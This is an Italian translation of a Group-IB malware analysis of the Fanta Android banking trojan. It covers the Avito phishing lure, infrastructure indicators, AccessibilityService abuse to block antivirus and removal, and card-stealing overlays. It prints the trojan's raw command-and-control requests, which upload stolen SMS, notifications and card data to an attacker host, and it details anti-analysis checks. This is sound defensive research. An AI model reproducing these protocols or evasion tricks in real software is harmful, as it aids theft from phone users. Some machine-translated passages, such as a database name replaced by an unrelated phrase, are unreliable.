Scorre, Fanta: nuova tattica del vecchio trojan per Android

Scorre, Fanta: nuova tattica del vecchio trojan per Android

Un giorno vorrai vendere qualcosa su Avito e, dopo aver pubblicato una descrizione dettagliata del tuo prodotto (ad esempio, un modulo di RAM), riceverai un messaggio come questo:

Scorre, Fanta: nuova tattica del vecchio trojan per AndroidAprendo il link, vedrai una pagina apparentemente innocua che avvisa te, il venditore fortunato e di successo, di aver effettuato una vendita:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Dopo aver premuto il pulsante “Continua”, un file APK con un'icona e un nome rassicurante verrà scaricato sul tuo dispositivo Android. Hai installato un'app che, per qualche motivo, richiedeva i diritti di AccessibilityService, poi sono apparsi e scomparsi rapidamente un paio di finestre e… E basta.

Accedi per controllare il tuo saldo, ma la tua app bancaria per qualche motivo richiede nuovamente i dati della tua carta. Dopo aver inserito le informazioni, succede qualcosa di terribile: per motivi che al momento non ti sono chiari, i soldi iniziano a scomparire dal tuo conto. Cerchi di risolvere il problema, ma il tuo telefono resiste: preme da solo i tasti “Indietro” e “Home”, non si spegne e non ti permette di attivare alcun sistema di protezione. Alla fine rimani senza soldi, il tuo prodotto non è stato acquistato, sei confuso e ti chiedi: cosa è successo?

La risposta è semplice: sei diventato vittima di un trojan Android Fanta, della famiglia Flexnet. Come è potuto succedere? Te lo spieghiamo ora.

Autori: Andrei Polovinkin, analista di malware junior, Ivan Pisarev, analista di malware.

Alcune statistiche

La famiglia di trojan Android Flexnet è stata scoperta per la prima volta nel 2015. Nel corso di un lungo periodo di attività, la famiglia si è ampliata in diverse varianti: Fanta, Limebot, Lipton, ecc. Il trojan, insieme alla relativa infrastruttura, non si ferma: vengono sviluppate nuove ed efficaci modalità di distribuzione — in questo caso, pagine di phishing di alta qualità mirate a venditori specifici, e i creatori del trojan seguono le ultime tendenze nella scrittura di virus — aggiungendo nuove funzionalità per rubare più efficacemente denaro dai dispositivi infetti e superare i meccanismi di protezione.

La campagna descritta in questo articolo è mirata agli utenti in Russia, un numero limitato di dispositivi infetti è stato registrato in Ucraina, ancora meno in Kazakhstan e Bielorussia.

Nonostante Flexnet sia attivo nel panorama dei trojan Android da oltre 4 anni e sia stato ampiamente analizzato da vari ricercatori, continua a essere molto efficace. A partire da gennaio 2019, il danno potenziale supera i 35 milioni di rubli — e questo è solo per le campagne in Russia. Nel 2015, diverse versioni di questo trojan Android venivano vendute su forum clandestini, dove era anche possibile trovare il codice sorgente del trojan con dettagliate descrizioni. Ciò significa che le statistiche sui danni a livello globale sono ancora più impressionanti. Non è un brutto risultato per un pezzo di tecnologia così “anziano”, vero?

Scorre, Fanta: nuova tattica del vecchio trojan per Android

Dalla vendita alla truffa

Come si può vedere dallo screenshot della pagina di phishing per il servizio online di inserzione di annunci Avito, essa è stata creata per una vittima specifica. A quanto pare, i malintenzionati utilizzano uno dei parser di Avito che estrae il numero di telefono e il nome del venditore, oltre alla descrizione del prodotto. Dopo aver aperto la pagina e preparato il file APK, viene inviato un messaggio SMS alla vittima con il suo nome e un link alla pagina di phishing, contenente la descrizione del suo prodotto e l'importo ottenuto dalla 'vendita' del prodotto. Cliccando sul pulsante, l'utente riceve un file APK dannoso — Fanta.

L'analisi del dominio shcet491[.]ru ha rivelato che è delegato ai server DNS dell'azienda Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Il file di zona del dominio contiene record che puntano a Indirizzi IP 31.220.23[.]236, 31.220.23[.]243 e 31.220.23[.]235. Tuttavia, il record principale del dominio (record A) punta a un server con indirizzo IP 178.132.1[.]240.

L'indirizzo IP 178.132.1[.]240 si trova nei Paesi Bassi ed è di proprietà dell'hosting provider WorldStream. Gli indirizzi IP 31.220.23[.]235, 31.220.23[.]236 e 31.220.23[.]243 si trovano nel Regno Unito e appartengono a un server di hosting virtuale HOSTINGER. Come registrar si utilizza openprov-ru. L'indirizzo IP 178.132.1[.]240 ha risolto anche i seguenti domini:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

È importante notare che quasi tutti i domini avevano link disponibili nel seguente formato:

http://(www.){0,1}/[0-9]{7}

Questo modello include anche i link provenienti da messaggi SMS. Dati storici hanno rivelato che a un dominio corrispondeva più di un link secondo il modello sopra descritto, il che suggerisce l'uso di un unico dominio per diffondere un trojan a più vittime.

Andando un po' avanti: come server di controllo, il trojan scaricato tramite il link SMS utilizza l'indirizzo onuseseddohap[.]club. Questo dominio è stato registrato il 12-03-2019, e a partire dal 29-04-2019 c'è stata interazione delle applicazioni APK con questo dominio. Sulla base dei dati ricevuti da VirusTotal, in totale 109 applicazioni hanno interagito con questo server. Il dominio stesso risolveva all'indirizzo IP 217.23.14[.]27, situato nei Paesi Bassi e di proprietà dell'hosting WorldStream. Come registrar viene utilizzato namecheap. A questo indirizzo IP sono stati associati anche i domini bad-racoon[.]club (a partire dal 25-09-2018) e bad-racoon[.]live (a partire dal 2018-10-25). Con dominio bad-racoon[.]club ha interagito con più di 80 file APK, con bad-racoon[.]live — oltre 100.

In generale, il processo di attacco si presenta nel seguente modo:

Scorre, Fanta: nuova tattica del vecchio trojan per Android

Cosa c'è sotto il cofano di Fanta?

Come molti altri trojan Android, Fanta è in grado di leggere e inviare SMS, effettuare richieste USSD, mostrare finestre proprie sopra le applicazioni (anche quelle bancarie). Tuttavia, nel repertorio delle funzionalità di questa famiglia è arrivata una novità: Fanta ha iniziato ad utilizzare AccessibilityService per vari scopi: leggere il contenuto delle notifiche di altre applicazioni, prevenire la scoperta e l'arresto dell'esecuzione del trojan sul dispositivo infetto, etc. Fanta funziona su tutte le versioni di Android a partire dalla 4.4. In questo articolo esamineremo più in dettaglio il seguente campione di Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Subito dopo l'avvio

Immediatamente dopo l'avvio, il trojan nasconde la sua icona. Il funzionamento dell'applicazione è possibile solo se il nome del dispositivo infetto non si trova nella lista:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Questo controllo viene effettuato nel servizio principale del trojan — MainService. Durante il primo avvio, vengono inizializzati i parametri di configurazione dell’applicazione con valori predefiniti (il formato di archiviazione dei dati di configurazione e il loro significato verranno trattati in seguito), e viene registrato un nuovo dispositivo infetto sul server di gestione. Al server verrà inviato un HTTP POST request con il tipo di messaggio register_bot e le informazioni sul dispositivo infetto (versione Android, IMEI, numero di telefono, nome dell'operatore e codice del paese in cui è registrato l'operatore). L'indirizzo del server di gestione è hXXp://onuseseddohap[.]club/controller.php. In risposta, il server invia un messaggio contenente i campi bot_id, bot_pwd, server — questi valori vengono salvati dall'app come parametri del server CnC. Il parametro server è facoltativo, se il campo non è stato ricevuto: Fanta utilizza l'indirizzo di registrazione — hXXp://onuseseddohap[.]club/controller.php. La funzione di modifica dell'indirizzo CnC può essere utilizzata per affrontare due problemi: distribuire uniformemente il carico tra più server (se ci sono molti dispositivi infetti, il carico su un server web non ottimizzato può essere elevato) e anche per utilizzare un server alternativo in caso di guasto di uno dei server CnC.

Se si verifica un errore durante l'invio della richiesta, il trojan ripeterà il processo di registrazione dopo 20 secondi.

Dopo la registrazione riuscita del dispositivo, Fanta mostrerà il seguente messaggio all'utente:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Nota importante: il servizio chiamato Sicurezza del sistema è il nome del servizio del trojan, e dopo aver cliccato sul pulsante OK si aprirà una finestra con le impostazioni di Accessibility del dispositivo infetto, dove l'utente deve concedere i diritti di Accessibility al servizio dannoso:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Non appena l'utente attiva AccessibilityService, Fanta ottiene accesso al contenuto delle finestre delle applicazioni e alle azioni eseguite in esse:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Subito dopo aver ottenuto i diritti di Accessibility, il trojan richiede i permessi di amministratore e i diritti di lettura delle notifiche:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Utilizzando AccessibilityService, l'applicazione simula la pressione dei tasti, ottenendo così tutti i permessi necessari.

Fanta crea diverse istanze di database (che saranno descritte in seguito), necessari per memorizzare i dati di configurazione e le informazioni raccolte sul dispositivo infetto. Per inviare le informazioni raccolte, il trojan crea un'attività ricorrente, progettata per scaricare i campi dal database e ricevere comandi dal server di comando. L'intervallo di comunicazione con CnC è impostato in base alla versione di Android: per la versione 5.1, l'intervallo sarà di 10 secondi, altrimenti di 60 secondi.

Per ricevere comandi, Fanta effettua una richiesta GetTask al server di comando. In risposta, CnC può inviare uno dei seguenti comandi:

TeamDescrizione
0Invia un messaggio SMS
1Effettua una chiamata telefonica o un comando USSD
2Aggiorna il parametro interval
3Aggiorna il parametro intercept
6Aggiorna il parametro smsManager
9Avvia la raccolta di messaggi SMS
11Ripristina il telefono alle impostazioni di fabbrica
12Abilita/Disabilita la registrazione della creazione delle finestre di dialogo

Fanta raccoglie anche notifiche da 70 applicazioni bancarie, sistemi di pagamento veloci e portafogli elettronici e le memorizza nel database.

Memorizzazione dei parametri di configurazione

Per memorizzare i parametri di configurazione, Fanta utilizza un approccio standard per la piattaforma Android — Preferences-file. Le impostazioni verranno salvate in un file chiamato settings. La descrizione dei parametri salvati si trova nella tabella sottostante.

NomeValore predefinitoValori possibiliDescrizione
id0InteroIdentificatore del bot
serverhXXp://onuseseddohap[.]club/URLIndirizzo del server di controllo
pwdStringaPassword per il server
interval20InteroIntervallo di tempo. Mostra di quanto ritardare l'esecuzione delle seguenti attività:
  • Quando si invia una richiesta sullo stato del messaggio SMS inviato
  • Ricezione di un nuovo comando dal server di controllo

interceptallall/telNumberSe il campo è uguale alla stringa all o telNumber, allora il messaggio SMS ricevuto sarà intercettato dall'app e non mostrato all'utente.
smsManager00/1Attivazione/disattivazione dell'app come destinatario predefinito degli SMS
readDialogfalseTrue/falseAttivazione/Disattivazione della registrazione degli eventi AccessibilityEvent

Inoltre, Fanta utilizza il file smsManager:

NomeValore predefinitoValori possibiliDescrizione
pckgStringaNome del gestore di SMS utilizzato

Interazione con i database

Durante il suo funzionamento, il trojan utilizza due database. Database di nome a viene utilizzato per memorizzare varie informazioni raccolte dal telefono. Il secondo database si chiama fanta.db e viene utilizzato per salvare le impostazioni relative alla creazione di finestre di phishing destinate a raccogliere informazioni sulle carte di credito.

Il trojan utilizza il database Più di 40.000 clienti in oltre 120 paesi per memorizzare le informazioni raccolte e registrare le proprie azioni. I dati sono memorizzati nella tabella logs. Per creare la tabella viene utilizzata la seguente query SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Nel database sono contenute le seguenti informazioni:

1. Registrazione dell'accensione del dispositivo infetto con il messaggio Il telefono è stato acceso!

2. Notifiche dalle app. Il messaggio viene formato secondo il seguente modello:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Dati delle carte di credito dai moduli di phishing creati dal trojan. Il parametro VIEW_NAME può essere uno dei seguenti:

  • AliExpress
  • Avito
  • Google Play
  • Varie <%App Name%>

Il messaggio viene registrato nel formato:

[<<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Numero della carta:<RD_NUMBER%>; Data:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. SMS in entrata/uscita nel formato:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Tipo: In entrata/Out) <%Mobile number%>:<%SMS-text%>

5. Informazioni sul pacchetto che genera la finestra dialogo nel formato:

(<%Package name%>)<%Package information%>

Esempio di tabella logs:

Scorre, Fanta: nuova tattica del vecchio trojan per Android
Una delle funzionalità di Fanta è la raccolta di informazioni sulle carte bancarie. La raccolta dei dati avviene creando finestre di phishing all'apertura delle applicazioni bancarie. Il trojan crea la finestra di phishing solo una volta. Le informazioni riguardanti l'aver mostrato la finestra all'utente vengono salvate nella tabella settings nel database fanta.db. Per creare il database viene utilizzata la seguente query SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tutti i campi della tabella settings sono inizializzati per impostazione predefinita al valore 1 (creare una finestra di phishing). Dopo che l'utente ha inserito i propri dati, il valore sarà impostato a 0. Esempio di campi della tabella settings:

  • can_login — il campo è responsabile della visualizzazione del modulo all'apertura dell'app bancaria
  • first_bank — non utilizzato
  • can_avito — il campo è responsabile della visualizzazione del modulo all'apertura dell'app Avito
  • can_ali — il campo è responsabile della visualizzazione del modulo all'apertura dell'app Aliexpress
  • can_another — il campo è responsabile della visualizzazione del modulo all'apertura di qualsiasi applicazione dall'elenco: Youla, Pandao, Drom Auto, Wallet. Carte sconto e bonus, Aviasales, Booking, Trivago
  • can_card — il campo è responsabile della visualizzazione del modulo all'apertura Google Play

Interazione con il server di gestione

L'interazione di rete con il server di gestione avviene tramite il protocollo HTTP. Fanta utilizza una popolare libreria Retrofit per gestire la rete. Le richieste vengono inviate all'indirizzo hXXp://onuseseddohap[.]club/controller.php. L'indirizzo del server può essere modificato al momento della registrazione sul server. La risposta del server può includere dei cookie. Fanta effettua le seguenti richieste al server:

  • La registrazione del bot sul server di gestione avviene una sola volta al primo avvio. Vengono inviati al server i seguenti dati sul dispositivo infetto:
    · Cookie — cookie ricevuti dal server (valore predefinito — stringa vuota)
    · mode — costante di stringa register_bot
    · prefix — costante intera 2
    · version_sdk — si forma secondo il seguente modello: /(Avit)
    · imei — IMEI del dispositivo infetto
    · country — codice della nazione in cui è registrato l'operatore, nel formato ISO
    · number — numero di telefono
    · operator — nome dell'operatore

    Esempio di richiesta inviata al server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=
    

    In risposta alla richiesta, il server deve restituire un oggetto JSON contenente i seguenti parametri:
    · bot_id — identificatore del dispositivo compromesso. Se bot_id è uguale a 0, Fanta ripeterà la richiesta.
    · bot_pwd — password per il server.
    · server — indirizzo del server di controllo. Parametro opzionale. Se non specificato, verrà utilizzato l'indirizzo memorizzato nell'applicazione.

    Esempio di oggetto JSON:

    {
        "response":[
       	 {
       		 "bot_id": ,
       		 "bot_pwd": ,
       		 "server": 
       	 }
        ],
        "status":"ok"
    }

  • Richiesta per ricevere un comando dal server. Vengono inviati al server i seguenti dati:
    · Cookie — cookie ricevuti dal server
    · bid — id del dispositivo compromesso, ottenuto inviando la richiesta register_bot
    · pwd — password per il server
    · divice_admin — campo che definisce se sono stati ottenuti i diritti di amministratore. Se i diritti di amministratore sono stati ottenuti, il campo è uguale a 1, altrimenti 0
    · Accessibilità — stato di funzionamento del servizio di accessibilità. Se il servizio è stato avviato, il valore è 1, altrimenti 0
    · SMSManager — indica se il trojan è impostato come applicazione predefinita per ricevere SMS
    · schermo — mostra in quale stato si trova lo schermo. Il valore sarà impostato 1, se lo schermo è acceso, altrimenti 0;

    Esempio di richiesta inviata al server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<V_ADM%>&Accessibility=<CSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    A seconda del comando, il server può restituire un oggetto JSON con vari parametri:

    · Team Invia un messaggio SMS: Nei parametri è presente il numero di telefono, il testo del messaggio SMS e l'identificativo del messaggio inviato. L'identificativo è utilizzato quando si invia il messaggio al server con tipo setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Team Effettua una chiamata telefonica o un comando USSD: Il numero di telefono o il comando arriva nel corpo della risposta.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Team Modificare il parametro interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Team Modificare il parametro intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Team Modifica il campo SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Team Esegui la raccolta dei messaggi SMS dal dispositivo compromesso.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Team Ripristina il telefono alle impostazioni di fabbrica:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Team Modifica il parametro ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Invio del messaggio di tipo setSmsStatus. Questa richiesta viene effettuata dopo l'esecuzione del comando Invia un messaggio SMS. La richiesta appare come segue:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=&status_sms=

  • Invio del contenuto del database. Con una richiesta viene inviata una riga. I seguenti dati vengono inviati al server:
    · Cookie — cookie ricevuti dal server
    · mode — costante di stringa setSaveInboxSms
    · bid — id del dispositivo compromesso, ottenuto inviando la richiesta register_bot
    · text — testo nella registrazione attuale del DB (campo d dalla tabella logs nel database Più di 40.000 clienti in oltre 120 paesi)
    · number — nome della registrazione attuale del DB (campo p dalla tabella logs nel database Più di 40.000 clienti in oltre 120 paesi)
    · sms_mode — valore intero (campo m dalla tabella logs nel database Più di 40.000 clienti in oltre 120 paesi)

    La richiesta appare come segue:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Una volta che il messaggio è stato inviato con successo al server, la riga verrà rimossa dalla tabella. Ecco un esempio dell'oggetto JSON restituito dal server:

    {
        "response":[],
        "status":"ok"
    }

Interazione con AccessibilityService

AccessibilityService è stato implementato per facilitare l'uso dei dispositivi Android da parte di persone con disabilità. Nella maggior parte dei casi, è necessario un intervento fisico per interagire con le applicazioni. AccessibilityService consente di farlo in modo programmatico. Fanta utilizza questo servizio per creare finestre false nelle applicazioni bancarie e impedire l'accesso alle impostazioni di sistema e ad alcune applicazioni.

Utilizzando le funzionalità di AccessibilityService, il trojan monitora le modifiche agli elementi sullo schermo del dispositivo infetto. Come già descritto, nelle impostazioni di Fanta è presente un'opzione che gestisce la registrazione delle operazioni con le finestre di dialogo — readDialog. Se questo parametro è impostato, verranno aggiunte al database informazioni sul nome e sulla descrizione del pacchetto che ha avviato l'evento. Il trojan esegue le seguenti azioni quando si verifica un evento:

  • Simula la pressione dei tasti indietro e home nel caso in cui:
    · l'utente desideri riavviare il proprio dispositivo
    · l'utente desideri disinstallare l'app “Avito” o modificare i permessi
    · si trovi un riferimento all'app “Avito” nella pagina
    · quando si apre l'app “Google Play Protect”
    · quando si aprono le pagine delle impostazioni AccessibilityService
    · quando appare la finestra di dialogo “Sicurezza di sistema”
    · quando si apre la pagina delle impostazioni “Draw over other app”
    · quando si apre la pagina “Applicazioni”, “Ripristino e reimpostazione”, “Ripristino dati”, “Ripristino impostazioni”, “Pannello sviluppatori”, “Accessibilità”, “Funzionalità speciali”, “Autorizzazioni speciali”
    · se l'evento è stato generato da determinate applicazioni.

    Elenco delle applicazioni

    • android
    • Master Lite
    • Clean Master
    • Clean Master per CPU x86
    • Gestione dei permessi delle applicazioni Meizu
    • MIUI Sicurezza
    • Clean Master — Antivirus & Pulizia della cache e dei file spazzatura
    • Controllo genitori e GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Sicurezza Web Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & protezione gratuita 2019
    • Mobile Security МегаФон
    • AVG Protection per Xperia
    • Sicurezza Mobile
    • Malwarebytes antivirus & protezione
    • Antivirus per Android 2019
    • Security Master — Antivirus, VPN, AppLock, Booster
    • AVG antivirus per tablet Huawei System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Sicurezza Mobile
    • Kaspersky Internet Security: Antivirus e Sicurezza
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security — protezione e gestione
    • AVG Antivirus gratuito 2019 – Sicurezza per Android
    • Antivirus Android
    • Norton Mobile Security e Antivirus
    • Antivirus, firewall, VPN, sicurezza mobile
    • Sicurezza Mobile: antivirus, VPN, protezione contro i furti
    • Antivirus per Android

  • Se durante l'invio di un SMS a un numero breve viene richiesta un'autorizzazione, Fanta simula la pressione sulla checkbox Ricordare la scelta e il pulsante inviare.
  • Se si tenta di sottrarre i diritti di amministratore a un trojan, si blocca lo schermo del telefono.
  • Impedisce l'aggiunta di nuovi amministratori.
  • Nel caso in cui l'app antivirus dr.web abbia rilevato una minaccia, Fanta simula la pressione del pulsante ignora.
  • Il trojan simula la pressione dei pulsanti indietro e home, se l'evento è stato generato dall'applicazione Samsung Device Care.
  • Fanta crea finestre di phishing con moduli per inserire informazioni sulle carte di credito, se è stata avviata un'app da un elenco che include circa 30 diversi servizi online. Tra questi: AliExpress, Booking, Avito, Componente Google Play Market, Pandao, Drom Auto e altri.

    Moduli di phishing

    Fanta analizza quali applicazioni vengono avviate sul dispositivo infetto. Se viene aperta un'applicazione di interesse, il trojan mostra una finestra di phishing sopra tutte le altre, che consiste in un modulo per inserire informazioni sulla carta di credito. L'utente deve inserire i seguenti dati:

    • Numero della carta
    • Data di scadenza della carta
    • CVV
    • Nome del titolare della carta (non per tutte le banche)

    A seconda dell'applicazione avviata, verranno mostrate diverse finestre di phishing. Di seguito verranno presentati esempi di alcune di esse:

    Aliexpress:

    Scorre, Fanta: nuova tattica del vecchio trojan per Android
    Avito:

    Scorre, Fanta: nuova tattica del vecchio trojan per Android
    Per alcune altre applicazioni, ad esempio Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Scorre, Fanta: nuova tattica del vecchio trojan per Android

    Come sono andate realmente le cose

    Fortunatamente, la persona che ha ricevuto il messaggio SMS descritto all'inizio dell'articolo era un esperto in cyber sicurezza. Pertanto, la versione reale, non sceneggiata, differisce da quella raccontata in precedenza: l'individuo ha ricevuto un SMS interessante e successivamente lo ha consegnato al team di Group-IB Threat Hunting Intelligence. Il risultato di questo attacco è l'articolo attuale. Una fine felice, non è vero? Tuttavia, non tutte le storie si concludono in modo così fortunato e affinché la tua storia non assomigli a una versione sceneggiata con la perdita di denaro, nella maggior parte dei casi è sufficiente seguire le seguenti regole, già ampiamente descritte:

    • non installare applicazioni per dispositivi mobili con sistema operativo Android da fonti diverse da Google Play
    • prestare particolare attenzione ai permessi richiesti dall'applicazione durante l'installazione
    • fare attenzione alle estensioni dei file scaricati
    • installare regolarmente gli aggiornamenti del sistema operativo Android
    • non visitare risorse sospette e non scaricare file da esse
    • non cliccare sui link ricevuti via SMS.

Fonte: habr.com

Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server 🔥 Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server | ProHoster